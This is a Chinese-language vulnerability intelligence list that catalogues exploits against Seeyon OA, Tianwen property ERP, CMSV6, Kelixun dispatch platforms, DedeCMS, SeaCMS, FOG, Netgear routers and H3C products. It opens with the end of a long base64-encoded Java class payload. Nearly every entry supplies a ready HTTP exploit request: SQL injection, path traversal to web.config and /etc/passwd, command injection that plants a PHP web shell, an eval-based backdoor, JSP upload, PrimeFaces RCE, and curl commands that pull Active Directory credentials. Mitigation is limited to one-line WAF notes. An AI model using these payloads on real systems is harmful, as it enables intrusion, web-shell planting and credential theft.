ZiR0Z1Wnk5VGRISnBibWM3U1NsV0FRQVBaMlYwVDNWMGNIVjBVM1J5WldGdEFRQVlLQ2xNYW1GMllTOXBieTlQZFhSd2RYUlRkSEpsWVcwN0FRQUlhWE5EYkc5elpXUUJBQk5xWVhaaEwybHZMMGx1Y0hWMFUzUnlaV0Z0QVFBSllYWmhhV3hoWW14bEFRQUVjbVZoWkFFQUZHcGhkbUV2YVc4dlQzVjBjSFYwVTNSeVpXRnRBUUFGZDNKcGRHVUJBQVZtYkhWemFBRUFCWE5zWldWd0FRQUVLRW9wVmdFQUNXVjRhWFJXWVd4MVpRRUFCV05zYjNObEFDRUFmZ0FpQUFBQUFnQUlBSDhBZ0FBQkFJRUFBQUFBQUFnQWdnQ0FBQUVBZ1FBQUFBQUFCZ0FCQUlNQWhBQUNBSVVBQUFRUkFBZ0FFUUFBQXRFcXR3QUd1QUFIdGdBSVRDdTJBQWtTQ3JZQUMwMHNCTFlBREN3cnRnQU53QUFPd0FBT1RnTTJCQlVFTGI2aUFxTXRGUVF5T2dVWkJjY0FCcWNDanhrRnRnQVBPZ1laQmhJUXRnQVJtZ0FOR1FZU0VyWUFFWm9BQnFjQ2NSa0Z0Z0FKRWhPMkFBdE5MQVMyQUF3c0dRVzJBQTA2QnhrSHdRQVVtZ0FHcHdKT0dRZTJBQWtTRmJZQUMwMHNCTFlBREN3WkI3WUFEVG9IR1FlMkFBa1NGcllBQzAybkFCWTZDQmtIdGdBSnRnQVl0Z0FZRWhhMkFBdE5MQVMyQUF3c0dRZTJBQTA2QnhrSHRnQUp0Z0FZRWhtMkFBdE5wd0FRT2dnWkI3WUFDUkladGdBTFRTd0V0Z0FNTEJrSHRnQU5PZ2NaQjdZQUNSSWF0Z0FMVFN3RXRnQU1MQmtIdGdBTndBQWJ3QUFiT2dnRE5na1ZDUmtJdVFBY0FRQ2lBYWdaQ0JVSnVRQWRBZ0E2Q2hrS3RnQUpFaDYyQUF0TkxBUzJBQXdzR1FxMkFBMDZDeGtMdGdBSkVoOER2UUFndGdBaEdRc0R2UUFpdGdBak9nd1pDN1lBQ1JJa0JMMEFJRmtEc2dBbHh3QVBFaWE0QUNkWnN3QWxwd0FHc2dBbFU3WUFJUmtMQkwwQUlsa0RFaWhUdGdBandBQXBPZzBaRGNjQUJxY0JKU29aRGJZQUtyWUFLem9PR1F5MkFBa1NMQVM5QUNCWkE3SUFMVk8yQUNFWkRBUzlBQ0paQTdzQUxsa1JBTWkzQUM5VHRnQWpWeW9TTUxZQU1Ub1BHUSsyQURJNkJ4a1BFak1HdlFBZ1dRT3lBRFRIQUE4U05iZ0FKMW16QURTbkFBYXlBRFJUV1FTeUFDMVRXUVd5QUMxVHRnQTJHUWNHdlFBaVdRTVpEbE5aQkxzQUxsa0R0d0F2VTFrRnV3QXVXUmtPdnJjQUwxTzJBQ05YR1F5MkFBa1NOd1M5QUNCWkF4a1BVN1lBSVJrTUJMMEFJbGtER1FkVHRnQWpWNmNBWWpvUEtoSTV0Z0F4T2hBWkVCSTZCTDBBSUZrRHNnQTB4d0FQRWpXNEFDZFpzd0EwcHdBR3NnQTBVN1lBTmhrUUJMMEFJbGtER1E1VHRnQWpPZ2NaRExZQUNSSTNCTDBBSUZrREdSQlR0Z0FoR1F3RXZRQWlXUU1aQjFPMkFDTlhwd0FYaEFrQnAvNVNwd0FJT2dhbkFBT0VCQUduL1Z5eEFBZ0Fsd0NpQUtVQUZ3REZBTk1BMWdBWEFkQUNWd0phQURnQU5nQTdBc1VBT0FBK0FGa0N4UUE0QUZ3QWZBTEZBRGdBZndLNUFzVUFPQUs4QXNJQ3hRQTRBQUVBaGdBQUFPNEFPd0FBQUEwQUJBQU9BQXNBRHdBVkFCQUFHZ0FSQUNZQUV3QXdBQlFBTmdBV0FENEFGd0JGQUJnQVhBQVpBR2NBR2dCc0FCc0FkQUFjQUg4QUhRQ0tBQjRBandBZkFKY0FJUUNpQUNRQXBRQWlBS2NBSXdDNEFDVUF2UUFtQU1VQUtBRFRBQ3NBMWdBcEFOZ0FLZ0RqQUN3QTZBQXRBUEFBTGdEN0FDOEJBQUF3QVE0QU1RRWRBRElCS0FBekFUTUFOQUU0QURVQlFBQTJBVmtBTndHU0FEZ0Jsd0E1QVpvQU93R2xBRHdCMEFBK0FkZ0FQd0hmQUVBQ05RQkJBbGNBUmdKYUFFSUNYQUJEQW1RQVJBS1hBRVVDdVFCSEFyd0FNUUxDQUVzQ3hRQkpBc2NBU2dMS0FCTUMwQUJOQUljQUFBQUVBQUVBT0FBQkFJZ0FpUUFDQUlVQUFBQTVBQUlBQXdBQUFCRXJ1QUFCc0UyNEFBZTJBRHNydGdBOHNBQUJBQUFBQkFBRkFBSUFBUUNHQUFBQURnQURBQUFBVndBRkFGZ0FCZ0JaQUljQUFBQUVBQUVBQWdBQkFJb0Fpd0FCQUlVQUFBQ1BBQVFBQXdBQUFGY3J4Z0FNRWowcnRnQSttUUFHRWord0s3WUFRRXdyRWtHMkFFS1pBQ2dyRWtFU1BiWUFReEpFdGdCRlRTeStCWjhBQmhKR3NDb3NBeklzQkRLNEFFZTJBRWl3S2lzU1FSSTl0Z0JERWtrU1BiWUFRN1lBU3JBQUFBQUJBSVlBQUFBbUFBa0FBQUJqQUEwQVpBQVFBR1lBRlFCbkFCNEFhUUFzQUdvQU1nQnJBRFVBYlFCREFHOEFBUUNNQUlzQUFRQ0ZBQUFCeWdBRUFBa0FBQUVxRWt1NEFFeTJBRTFOSzdZQVFFd0JUZ0U2QkN3U1RyWUFFWmtBUUNzU1Q3WUFFWmtBSUNzU1VMWUFFWm9BRjdzQVVWbTNBRklydGdCVEVsUzJBRk8yQUZWTUJyMEFLVmtERWloVFdRUVNWbE5aQlN0VE9nU25BRDByRWsrMkFCR1pBQ0FyRWxDMkFCR2FBQmU3QUZGWnR3QlNLN1lBVXhKWHRnQlR0Z0JWVEFhOUFDbFpBeEpZVTFrRUVsbFRXUVVyVXpvRXVBQmFHUVMyQUZ0T3V3QmNXUzIyQUYyM0FGNFNYN1lBWURvRkdRVzJBR0daQUFzWkJiWUFZcWNBQlJJOU9nYTdBRnhaTGJZQVk3Y0FYaEpmdGdCZ09nVzdBRkZadHdCU0dRYTJBRk1aQmJZQVlaa0FDeGtGdGdCaXB3QUZFajIyQUZPMkFGVTZCaGtHT2djdHhnQUhMYllBWkJrSHNEb0ZHUVcyQUdVNkJpM0dBQWN0dGdCa0dRYXdPZ2d0eGdBSExiWUFaQmtJdndBRUFKTUEvZ0VKQURnQWt3RCtBUjBBQUFFSkFSSUJIUUFBQVIwQkh3RWRBQUFBQVFDR0FBQUFiZ0FiQUFBQWN3QUpBSFFBRGdCMUFCQUFkZ0FUQUhjQUhBQjRBQzRBZVFCQ0FIc0FXUUI5QUdzQWZnQi9BSUFBa3dDREFKd0FoQUN1QUlVQXdnQ0dBTlFBaHdENkFJZ0EvZ0NNQVFJQWpRRUdBSWdCQ1FDSkFRc0FpZ0VTQUl3QkZnQ05BUm9BaWdFZEFJd0JJd0NOQUFFQWpRQ09BQUVBaFFBQUFZTUFCQUFNQUFBQTh4Skx1QUJNdGdCTkVrNjJBQkdhQUJDN0FDbFpFbWEzQUdkT3B3QU51d0FwV1JKb3R3Qm5UcmdBV2kyMkFHazZCTHNBYWxrckxMWUFhN2NBYkRvRkdRUzJBRjA2QmhrRXRnQmpPZ2NaQmJZQWJUb0lHUVMyQUc0NkNSa0Z0Z0J2T2dvWkJiWUFjSm9BWUJrR3RnQnhuZ0FRR1FvWkJyWUFjcllBYzZmLzdoa0h0Z0J4bmdBUUdRb1pCN1lBY3JZQWM2Zi83aGtJdGdCeG5nQVFHUWtaQ0xZQWNyWUFjNmYvN2hrS3RnQjBHUW0yQUhRVUFIVzRBSGNaQkxZQWVGZW5BQWc2QzZmL25oa0V0Z0JrR1FXMkFIbW5BQ0JPdXdCUldiY0FVaEo2dGdCVExiWUFlN1lBVXhKOHRnQlR0Z0JWc0JKOXNBQUNBTGdBdmdEQkFEZ0FBQURRQU5NQU9BQUJBSVlBQUFCdUFCc0FBQUNiQUJBQW5BQWRBSjRBSndDZ0FEQUFvUUErQUtJQVV3Q2pBR0VBcEFCcEFLVUFjUUNtQUg0QXFBQ0dBS2tBa3dDckFKc0FyQUNvQUs0QXJRQ3ZBTElBc0FDNEFMSUF2Z0N6QU1FQXRBRERBTFVBeGdDM0FNc0F1QURRQUxzQTB3QzVBTlFBdWdEd0FMd0FDQUNQQUlrQUFnQ0ZBQUFBTWdBREFBSUFBQUFTS3JnQUFiQk11d0FEV1N1MkFBUzNBQVcvQUFFQUFBQUVBQVVBQWdBQkFJWUFBQUFHQUFFQUFBQTNBSUVBQUFBQUFBRUFrQUFBQUFJQWtRPT0iOwpjbHogPSBkZWZpbmVDbGFzcyhiYXNlNjREZWNvZGVUb0J5dGUoY29kZSkpOwpjbHoubmV3SW5zdGFuY2UoKTt0AARldmFsdXEAfgAbAAAAAXEAfgAjc3IAEWphdmEudXRpbC5IYXNoTWFwBQfawcMWYNEDAAJGAApsb2FkRmFjdG9ySQAJdGhyZXNob2xkeHA/QAAAAAAAAHcIAAAAEAAAAAB4eHg=)}}
致远 OA thirdpartyController 接口身份鉴别绕过漏洞
| 漏洞类型 |
涉及版本 |
利用路径 |
处置建议 |
情报获取时间 |
0day/1day/nday |
| 未授权访问 |
未知 |
/seeyon/thirdpartyController.do |
WAF封禁路路径,等待发布补丁 |
807 |
nday |
漏洞详情
POST /seeyon/thirdpartyController.do?method=access HTTP/1.1
Host:
method=access&enc=TT5uZnR0YmhmL21qb2wvZXBkL2dwbWVmcy9wcWZvJ04%2BLjgzODQxNDMxMjQzNDU4NTkyNzknVT4zNjk0NzI5NDo3MjU4
天问
天问物业 ERP 系统 AreaAvatarDownLoad.aspx 任意文件读取漏洞
| 漏洞类型 |
涉及版本 |
利用路径 |
处置建议 |
情报获取时间 |
0day/1day/nday |
| 任意文件读取 |
未知 |
/HM/Main/InformationManage/AreaAvatarDownLoad.aspx |
WAF封禁路径,等待发布补丁 |
722 |
未知 |
漏洞详情
GET /HM/Main/InformationManage/AreaAvatarDownLoad.aspx?AreaAvatar=../web.config HTTP/1.1
天问物业ERP系统ContractDownLoad存在任意文件读取漏洞
| 漏洞类型 |
涉及版本 |
利用路径 |
处置建议 |
情报获取时间 |
0day/1day/nday |
| 任意文件读取 |
未知 |
/HM/M_Main/WorkGeneral/docfileDownLoad.aspx?AdjunctFile=../web.config |
WAF封禁路路径,等待发布补丁 |
725 |
nday |
漏洞详情
/HM/M_Main/WorkGeneral/docfileDownLoad.aspx?AdjunctFile=../web.config
天问物业ERP系统OwnerVacantDownLoad存在任意文件读取漏洞
| 漏洞类型 |
涉及版本 |
利用路径 |
处置建议 |
情报获取时间 |
0day/1day/nday |
| 任意文件读取 |
未知 |
/HM/M_main/InformationManage/OwnerVacantDownLoad.aspx |
WAF封禁路路径,等待发布补丁 |
729 |
1day |
漏洞详情
GET /HM/M_main/InformationManage/OwnerVacantDownLoad.aspx?OwnerVacantFile=../web.config HTTP/1.1
天问物业ERP系统VacantDiscountDownLoad存在任意文件读取漏洞
| 漏洞类型 |
涉及版本 |
利用路径 |
处置建议 |
情报获取时间 |
0day/1day/nday |
| 任意文件读取 |
未知 |
/HM/M_main/InformationManage/VacantDiscountDownLoad.aspx |
WAF封禁路路径,等待发布补丁 |
729 |
1day |
漏洞详情
GET /HM/M_main/InformationManage/VacantDiscountDownLoad.aspx?VacantDiscountFile=../web.config HTTP/1.1
通天星CMSV6车载定位监控平台getAlarmAppealByGuid存在SQL注入漏洞
| 漏洞类型 |
涉及版本 |
利用路径 |
处置建议 |
情报获取时间 |
0day/1day/nday |
| SQL注入 |
未知 |
/alarm_appeal/getAlarmAppealByGuid;downloadLogger.action |
WAF封禁路路径,等待发布补丁 |
0829 |
1day |
漏洞详情
POST /alarm_appeal/getAlarmAppealByGuid;downloadLogger.action HTTP/1.1
guid=1') AND (SELECT 3904 FROM (SELECT(SLEEP(5)))PITq) AND ('qhqF'='qhqF
通天星CMSV6车载定位监控平台getAlarmAppealByGuid存在SQL注入漏洞
| 漏洞类型 |
涉及版本 |
利用路径 |
处置建议 |
情报获取时间 |
0day/1day/nday |
| SQL注入 |
未知 |
/alarm_appeal/getAlarmAppealByGuid;downloadLogger.action |
WAF封禁路路径,等待发布补丁 |
0829 |
1day |
漏洞详情
POST /alarm_appeal/getAlarmAppealByGuid;downloadLogger.action HTTP/1.1
guid=1') AND (SELECT 3904 FROM (SELECT(SLEEP(5)))PITq) AND ('qhqF'='qhqF
科立讯通信
福建科立讯通信 指挥调度管理平台 ajax users.php SQL 注入漏洞
| 漏洞类型 |
涉及版本 |
利用路径 |
处置建议 |
情报获取时间 |
0day/1day/nday |
| SQL注入 |
未知 |
/app/ext/ajax_users.php |
WAF封禁路径,等待发布补丁 |
722 |
未知 |
漏洞详情
POST /app/ext/ajax_users.php HTTP/1.1
encodeddep leveI=1’) UNION ALL SELECT NULL,CONCAT(0x7e,user0,0x7e),NULL,NULL,NULL-- -
福建科立讯通信 指挥调度管理平台存在远程命令执行漏洞
| 漏洞类型 |
涉及版本 |
利用路径 |
处置建议 |
情报获取时间 |
0day/1day/nday |
| RCE |
未知 |
/api/client/audiobroadcast/invite_one_member.php |
WAF封禁路径,等待发布补丁 |
722 |
nday |
漏洞详情
GET /api/client/audiobroadcast/invite_one_member.php?callee=1&roomid=%60echo%20test%3Etest.txt%60 HTTP/1.1
Host:
福建科立讯通信 指挥调度管理平台ajax_users存在SQL注入漏洞
| 漏洞类型 |
涉及版本 |
利用路径 |
处置建议 |
情报获取时间 |
0day/1day/nday |
| SQL注入 |
未知 |
/app/ext/ajax_users.php |
使用WAF进行拦截 |
724 |
nday |
漏洞详情
POST /app/ext/ajax_users.php HTTP/1.1
dep_level=1') UNION ALL SELECT NULL,CONCAT(0x7e,md5(123456),0x7e),NULL,NULL,NULL-- -
织梦
DedeCMSV5.7.114后台article_template_rand.php存在远程代码执行漏洞
| 漏洞类型 |
涉及版本 |
利用路径 |
处置建议 |
情报获取时间 |
0day/1day/nday |
| RCE |
V5.7.114 |
/dede/article_template_rand.php |
WAF封禁路径,等待发布补丁 |
722 |
nday |
漏洞详情
POST /dede/article_template_rand.php HTTP/1.1
dopost=save&token=7fa44bfa91d7f797b4c983c76f7c9f9e&templates=%3C%3Fphp%0D%0A%0D%0A%2F%2F%E8%BF%99%E4%B8%AA%E5%80%BC%E4%B8%BA+0+%E8%A1%A8%E7%A4%BA%E5%85%B3%E9%97%AD%E6%AD%A4%E8%AE%BE%E7%BD%AE%EF%BC%8C+%E4%B8%BA+1+%E8%A1%A8%E7%A4%BA%E5%BC%80%E5%90%AF%0D%0A%24cfg_tamplate_rand+%3D+0%3B%0D%0A%0D%0A%2F%2F%E6%A8%A1%E6%9D%BF%E6%95%B0%E7%BB%84%EF%BC%8C%E5%A6%82%E6%9E%9C%E9%9C%80%E8%A6%81%E5%A2%9E%E5%8A%A0%EF%BC%8C%E6%8C%89%E8%BF%99%E4%B8%AA%E6%A0%BC%E5%BC%8F%E5%A2%9E%E5%8A%A0%E6%88%96%E4%BF%AE%E6%94%B9%E5%8D%B3%E5%8F%AF%28%E5%BF%85%E9%A1%BB%E7%A1%AE%E4%BF%9D%E8%BF%99%E4%BA%9B%E6%A8%A1%E6%9D%BF%E6%98%AF%E5%AD%98%E5%9C%A8%E7%9A%84%29%EF%BC%8C%E5%B9%B6%E4%B8%94%E6%95%B0%E9%87%8F%E5%BF%85%E9%A1%BB%E4%B8%BA2%E4%B8%AA%E6%88%96%E4%BB%A5%E4%B8%8A%E3%80%82%0D%0A%24cfg_tamplate_arr%5B%5D+%3D+%27article_article.htm%27%3B%0D%0A%24cfg_tamplate_arr%5B%5D+%3D+%27article_article1.htm%27%3B%0D%0A%24cfg_tamplate_arr%5B%5D+%3D+%27article_article2.htm%27%3B%0D%0A%24a+%3D+%27_POST%27%3B%0D%0A%24%24a%5B1%5D%28%24%24a%5B0%5D%29%3B%0D%0A%3F%3E%0D%0A&imageField1.x=6&imageField1.y=9
DedeCMSV5.7.114后台sys_verizes.php存在远程代码执行漏洞
| 漏洞类型 |
涉及版本 |
利用路径 |
处置建议 |
情报获取时间 |
0day/1day/nday |
| RCE |
V5.7.114 |
/dede/sys_verifies.php |
WAF封禁路径,等待发布补丁 |
722 |
nday |
漏洞详情
GET /dede/sys_verifies.php?action=getfiles&refiles[]=123${${print%20`whoami`}} HTTP/1.1
DeDecms接口sys_verifies.php存在任意文件读取漏洞
| 漏洞类型 |
涉及版本 |
利用路径 |
处置建议 |
情报获取时间 |
0day/1day/nday |
| 任意文件读取 |
未知 |
/dede/sys_verifies.php |
WAF封禁路路径,等待发布补丁 |
0819 |
nday |
利用路径
/dede/sys_verifies.php?action=view&filename=../../../../../etc/passwd
DeDecms接口sys_verifies.php存在任意文件读取漏洞
| 漏洞类型 |
涉及版本 |
利用路径 |
处置建议 |
情报获取时间 |
0day/1day/nday |
| 任意文件读取 |
未知 |
/dede/sys_verifies.php |
WAF封禁路路径,等待发布补丁 |
0819 |
nday |
利用路径
/dede/sys_verifies.php?action=view&filename=../../../../../etc/passwd
海洋
海洋CMS后台admin_smtp.php存在远程代码执行漏洞
| 漏洞类型 |
涉及版本 |
利用路径 |
处置建议 |
情报获取时间 |
0day/1day/nday |
| RCE |
12.9 |
/at1fcg/admin_smtp.php |
WAF封禁路径,等待发布补丁 |
722 |
nday |
漏洞详情
POST /at1fcg/admin_smtp.php?action=set HTTP/1.1
smtpserver=${eval($_POST[1])}&smtpserverport=&smtpusermail=12345%40qq.com&smtpname=%E6%B5%B7%E6%B4%8B%E5%BD%B1%E8%A7%86%E7%BD%91&smtpuser=12345%40qq.com&smtppass=123456789&smtpreg=off&smtppsw=
SeaCMS海洋影视管理系统index.php存在SQL注入漏洞
| 漏洞类型 |
涉及版本 |
利用路径 |
处置建议 |
情报获取时间 |
0day/1day/nday |
| SQL注入 |
未知 |
/js/player/dmplayer/dmku/index.php?ac=edit |
WAF封禁路路径,等待发布补丁 |
0826 |
0day |
漏洞详情
POST /js/player/dmplayer/dmku/index.php?ac=edit HTTP/1.1
cid=(select(1)from(select(sleep(6)))x)&text=1&color=1
FOG
fogproject系统接口export.php存在远程命令执行漏洞(C
| 漏洞类型 |
涉及版本 |
利用路径 |
处置建议 |
情报获取时间 |
0day/1day/nday |
| RCE |
<=1.5.10.34 |
/fog/management/export.php |
WAF封禁路径,等待发布补丁 |
722 |
nday |
漏洞详情
POST /fog/management/export.php?filename=$(echo+'<?php+echo+shell_exec($_GET['"'cmd'"']);+?>'+>+lol.php)&type=pdf HTTP/1.1
fogguiuser=fog&nojson=2
FOG敏感信息泄露(CVE-2024-41108)
| 漏洞类型 |
涉及版本 |
利用路径 |
处置建议 |
情报获取时间 |
0day/1day/nday |
| 信息泄露 |
未知 |
/fog/service/hostinfo.php |
|
|
|
| /fog/service/hostnameloop.php |
|
|
|
|
|
| /fog/service/blame.php |
|
|
|
|
|
| /fog/service/hostinfo.php |
|
|
|
|
|
| /fog/service/hostname.php |
WAF封禁路路径,等待发布补丁 |
807 |
nday |
|
|
漏洞详情
1. 获取hostname
curl -i -s -k -X $'POST' --data-binary $'file=/var/log/fog/fogscheduler.log&ip=<BASE64_SERVERIP>' $'http://<SERVERIP>/fog/status/logtoview.php'
2. 验证hostname、获取mac地址
GET /fog/service/hostnameloop.php?host=dGVzdGhvc3Q=
3. 验证mac地址
GET /fog/service/blame.php?mac=aa:aa:aa:aa:aa:aa
response:## 有洞
response:no active task 无洞
4. 获取AD敏感信息
curl -i -s -k -X $'GET' -H 'User-Agent:' $'http://<SERVERIP>/fog/service/hostinfo.php?mac=aa:aa:aa:aa:aa:aa'
5. 获取AD凭证信息
curl -i -s -k -X $'GET' $'http://<SERVERIP>/fog/service/hostname.php?mac=aa:aa:aa:aa:aa:aa'
网件
Netgear-WN604接口downloadFile.php信息泄露漏洞(
| 漏洞类型 |
涉及版本 |
利用路径 |
处置建议 |
情报获取时间 |
0day/1day/nday |
| 信息泄露 |
未知 |
/downloadFile.php |
WAF封禁路径,等待发布补丁 |
722 |
nday |
漏洞详情
GET /downloadFile.php?file=config HTTP/1.1
Netgear WN604无线路由器siteSurvey.php存在未授权访问漏洞
| 漏洞类型 |
涉及版本 |
利用路径 |
处置建议 |
情报获取时间 |
0day/1day/nday |
| 未授权访问 |
未知 |
/siteSurvey.php |
WAF封禁路路径,等待发布补丁 |
807 |
nday |
漏洞详情
/siteSurvey.php
H3C
H3C Workspace 云桌面 远程命令执行漏洞
| 漏洞类型 |
涉及版本 |
利用路径 |
处置建议 |
情报获取时间 |
0day/1day/nday |
| RCE |
<= E1013P13 |
/webui/?g=aaa_portal_auth_adv_submit&tab_name=广告模板&welcome_word=广告模板&btn_color=337ab7&suffix=.php&bkg_flag=0&check_btn_color=&des=undefined |
等着 |
722 |
0day |
漏洞详情
/webui/?g=aaa_portal_auth_adv_submit&tab_name=广告模板&welcome_word=广告模板&btn_color=337ab7&suffix=%7Burlenc(%60id+%3E/usr/local/webui/test.txt%60)%7D&bkg_flag=0&check_btn_color=&des=undefined
H3C Magic B1STV100R012 RCE
| 漏洞类型 |
涉及版本 |
利用路径 |
处置建议 |
情报获取时间 |
0day/1day/nday |
| RCE |
未知 |
/imc/javax.faces.resource/dynamiccontent.properties.xhtml |
WAF封禁路路径,等待发布补丁 |
725 |
nday |
漏洞详情
POST /imc/javax.faces.resource/dynamiccontent.properties.xhtml HTTP/1.1
pfdrt=sc&ln=primefaces&pfdrid=uMKljPgnOTVxmOB%2BH6%2FQEPW9ghJMGL3PRdkfmbiiPkUDzOAoSQnmBt4dYyjvjGhVqupdmBV%2FKAe9gtw54DSQCl72JjEAsHTRvxAuJC%2B%2FIFzB8dhqyGafOLqDOqc4QwUqLOJ5KuwGRarsPnIcJJwQQ7fEGzDwgaD0Njf%2FcNrT5NsETV8ToCfDLgkzjKVoz1ghGlbYnrjgqWarDvBnuv%2BEo5hxA5sgRQcWsFs1aN0zI9h8ecWvxGVmreIAuWduuetMakDq7ccNwStDSn2W6c%2BGvDYH7pKUiyBaGv9gshhhVGunrKvtJmJf04rVOy%2BZLezLj6vK%2BpVFyKR7s8xN5Ol1tz%2FG0VTJWYtaIwJ8rcWJLtVeLnXMlEcKBqd4yAtVfQNLA5AYtNBHneYyGZKAGivVYteZzG1IiJBtuZjHlE3kaH2N2XDLcOJKfyM%2FcwqYIl9PUvfC2Xh63Wh4yCFKJZGA2W0bnzXs8jdjMQoiKZnZiqRyDqkr5PwWqW16%2FI7eog15OBl4Kco%2FVjHHu8Mzg5DOvNevzs7hejq6rdj4T4AEDVrPMQS0HaIH%2BN7wC8zMZWsCJkXkY8GDcnOjhiwhQEL0l68qrO%2BEb%2F60MLarNPqOIBhF3RWB25h3q3vyESuWGkcTjJLlYOxHVJh3VhCou7OICpx3NcTTdwaRLlw7sMIUbF%2FciVuZGssKeVT%2FgR3nyoGuEg3WdOdM5tLfIthl1ruwVeQ7FoUcFU6RhZd0TO88HRsYXfaaRyC5HiSzRNn2DpnyzBIaZ8GDmz8AtbXt57uuUPRgyhdbZjIJx%2FqFUj%2BDikXHLvbUMrMlNAqSFJpqoy%2FQywVdBmlVdx%2BvJelZEK%2BBwNF9J4p%2F1fQ8wJZL2LB9SnqxAKr5kdCs0H%2FvouGHAXJZ%2BJzx5gcCw5h6%2Fp3ZkZMnMhkPMGWYIhFyWSSQwm6zmSZh1vRKfGRYd36aiRKgf3AynLVfTvxqPzqFh8BJUZ5Mh3V9R6D%2FukinKlX99zSUlQaueU22fj2jCgzvbpYwBUpD6a6tEoModbqMSIr0r7kYpE3tWAaF0ww4INtv2zUoQCRKo5BqCZFyaXrLnj7oA6RGm7ziH6xlFrOxtRd%2BLylDFB3dcYIgZtZoaSMAV3pyNoOzHy%2B1UtHe1nL97jJUCjUEbIOUPn70hyab29iHYAf3%2B9h0aurkyJVR28jIQlF4nT0nZqpixP%2Fnc0zrGppyu8dFzMqSqhRJgIkRrETErXPQ9sl%2BzoSf6CNta5ssizanfqqCmbwcvJkAlnPCP5OJhVes7lKCMlGH%2BOwPjT2xMuT6zaTMu3UMXeTd7U8yImpSbwTLhqcbaygXt8hhGSn5Qr7UQymKkAZGNKHGBbHeBIrEdjnVphcw9L2BjmaE%2BlsjMhGqFH6XWP5GD8FeHFtuY8bz08F4Wjt5wAeUZQOI4rSTpzgssoS1vbjJGzFukA07ahU%3D&cmd=whoami
H3C 用户自助服务平台 dynamiccontent.properties.xhtml存在RCE漏洞
| 漏洞类型 |
涉及版本 |
利用路径 |
处置建议 |
情报获取时间 |
0day/1day/nday |
| RCE |
未知 |
/mselfservice/javax.faces.resource/dynamiccontent.properties.xhtml |
WAF封禁路路径,等待发布补丁 |
725 |
nday |
漏洞详情
POST /mselfservice/javax.faces.resource/dynamiccontent.properties.xhtml HTTP/1.1
pfdrt=sc&ln=primefaces&pfdrid=uMKljPgnOTVxmOB%2BH6%2FQEPW9ghJMGL3PRdkfmbiiPkUDzOAoSQnmBt4dYyjvjGhVqupdmBV%2FKAe9gtw54DSQCl72JjEAsHTRvxAuJC%2B%2FIFzB8dhqyGafOLqDOqc4QwUqLOJ5KuwGRarsPnIcJJwQQ7fEGzDwgaD0Njf%2FcNrT5NsETV8ToCfDLgkzjKVoz1ghGlbYnrjgqWarDvBnuv%2BEo5hxA5sgRQcWsFs1aN0zI9h8ecWvxGVmreIAuWduuetMakDq7ccNwStDSn2W6c%2BGvDYH7pKUiyBaGv9gshhhVGunrKvtJmJf04rVOy%2BZLezLj6vK%2BpVFyKR7s8xN5Ol1tz%2FG0VTJWYtaIwJ8rcWJLtVeLnXMlEcKBqd4yAtVfQNLA5AYtNBHneYyGZKAGivVYteZzG1IiJBtuZjHlE3kaH2N2XDLcOJKfyM%2FcwqYIl9PUvfC2Xh63Wh4yCFKJZGA2W0bnzXs8jdjMQoiKZnZiqRyDqkr5PwWqW16%2FI7eog15OBl4Kco%2FVjHHu8Mzg5DOvNevzs7hejq6rdj4T4AEDVrPMQS0HaIH%2BN7wC8zMZWsCJkXkY8GDcnOjhiwhQEL0l68qrO%2BEb%2F60MLarNPqOIBhF3RWB25h3q3vyESuWGkcTjJLlYOxHVJh3VhCou7OICpx3NcTTdwaRLlw7sMIUbF%2FciVuZGssKeVT%2FgR3nyoGuEg3WdOdM5tLfIthl1ruwVeQ7FoUcFU6RhZd0TO88HRsYXfaaRyC5HiSzRNn2DpnyzBIaZ8GDmz8AtbXt57uuUPRgyhdbZjIJx%2FqFUj%2BDikXHLvbUMrMlNAqSFJpqoy%2FQywVdBmlVdx%2BvJelZEK%2BBwNF9J4p%2F1fQ8wJZL2LB9SnqxAKr5kdCs0H%2FvouGHAXJZ%2BJzx5gcCw5h6%2Fp3ZkZMnMhkPMGWYIhFyWSSQwm6zmSZh1vRKfGRYd36aiRKgf3AynLVfTvxqPzqFh8BJUZ5Mh3V9R6D%2FukinKlX99zSUlQaueU22fj2jCgzvbpYwBUpD6a6tEoModbqMSIr0r7kYpE3tWAaF0ww4INtv2zUoQCRKo5BqCZFyaXrLnj7oA6RGm7ziH6xlFrOxtRd%2BLylDFB3dcYIgZtZoaSMAV3pyNoOzHy%2B1UtHe1nL97jJUCjUEbIOUPn70hyab29iHYAf3%2B9h0aurkyJVR28jIQlF4nT0nZqpixP%2Fnc0zrGppyu8dFzMqSqhRJgIkRrETErXPQ9sl%2BzoSf6CNta5ssizanfqqCmbwcvJkAlnPCP5OJhVes7lKCMlGH%2BOwPjT2xMuT6zaTMu3UMXeTd7U8yImpSbwTLhqcbaygXt8hhGSn5Qr7UQymKkAZGNKHGBbHeBIrEdjnVphcw9L2BjmaE%2BlsjMhGqFH6XWP5GD8FeHFtuY8bz08F4Wjt5wAeUZQOI4rSTpzgssoS1vbjJGzFukA07ahU%3D&cmd=whoami
H3C-CVM-upload接口前台任意文件上传漏洞
| 漏洞类型 |
涉及版本 |
利用路径 |
处置建议 |
情报获取时间 |
0day/1day/nday |
| RCE |
未知 |
/cas/fileUpload/upload |
WAF封禁路路径,等待发布补丁 |
725 |
nday |
漏洞详情
POST /cas/fileUpload/upload?token=/../../../../../var/lib/tomcat8/webapps/cas/js/lib/buttons/a.jsp&name=123 HTTP/1.1
<%out.println("test");%>
H3C-SecParh堡垒机任意用户登录漏洞
| 漏洞类型 |
涉及版本 |
利用路径 |
处置建议 |
情报获取时间 |
0day/1day/nday |
| 未授权访问 |
未知 |
/audit/gui_detail_view.php |
WAF封禁路路径,等待发布补丁 |
725 |
nday |
漏洞详情
/audit/gui_detail_view.php?token=1&id=%5C&uid=%2Cchr(97))%20or%201:%20print%20chr(121)%2bchr(101)%2bchr(115)%0d%0a%23&login=admin
H3C网络管理系统任意文件读取漏洞
| 漏洞类型 |
涉及版本 |
利用路径 |
处置建议 |
情报获取时间 |
0day/1day/nday |
| 任意文件读取 |
未知 |
/webui/?file_name= |
WAF封禁路路径,等待发布补丁 |
725 |
nday |
漏洞详情
GET /webui/?file_name=../../../../../etc/passwd&g=sys_dia_data_down HTTP/1.1
H3C-校园网自助服务系统flexfileupload任意文件上传漏洞
| 漏洞类型 |
涉及版本 |
利用路径 |
处置建议 |
情报获取时间 |
0day/1day/nday |
| RCE |
未知 |
/imc/primepush/%2e%2e/flexFileUpload |
WAF封禁路路径,等待发布补丁 |
725 |
nday |
漏洞详情
POST /imc/primepush/%2e%2e/flexFileUpload HTTP/1.1
-----------------WebKitFormBoundaryMmx988TUuintqO4Q
1111
-----------------WebKitFormBoundaryMmx988TUuintqO4Q--
H3C密码泄露漏洞
| 漏洞类型 |
涉及版本 |
利用路径 |
处置建议 |
